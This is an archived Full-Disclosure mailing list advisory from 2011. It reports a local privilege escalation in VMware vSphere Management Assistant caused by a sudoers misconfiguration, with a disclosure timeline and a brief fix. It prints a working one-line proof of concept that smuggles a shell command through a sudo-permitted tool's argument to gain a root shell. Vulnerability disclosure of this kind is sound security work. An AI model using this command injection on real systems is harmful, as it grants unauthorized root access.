| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 16 May 2011 09:24:13 +0200 From: Piotr Duszynski <piotr@...zynski.eu> To: <full-disclosure@...ts.grok.org.uk> Subject: Vmware vSphere Management Assistant (vMA) - Local Privilege Escalation ======================================================================= Vmware vSphere Management Assistant (vMA) - Local Privilege Escalation ======================================================================= Affected Software : Vmware vSphere Management Assistant (vMA) Severity : Medium Local/Remote : Local Author : @drk1wi [Summary] Due to an error in the /etc/sudoers file it is possible to run arbitrary shell commands within the context of root user. [Vulnerability Details] [vi-admin@vMA ~]$ sudo /usr/bin/vmatargetcon --shell=/bin/bash "'raz';/bin/bash;" 35|ERROR|1|Unable to resolve hostname. [root@vMA vi-admin]# [Time-line] 27/04/2010 - Vendor notified 28/04/2010 - Vendor response ??? - Vendor patch release 16/05/2011 - Public disclosure [Fix Information] Edit the /etc/sudoers file. Cheers, @drk1wi _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists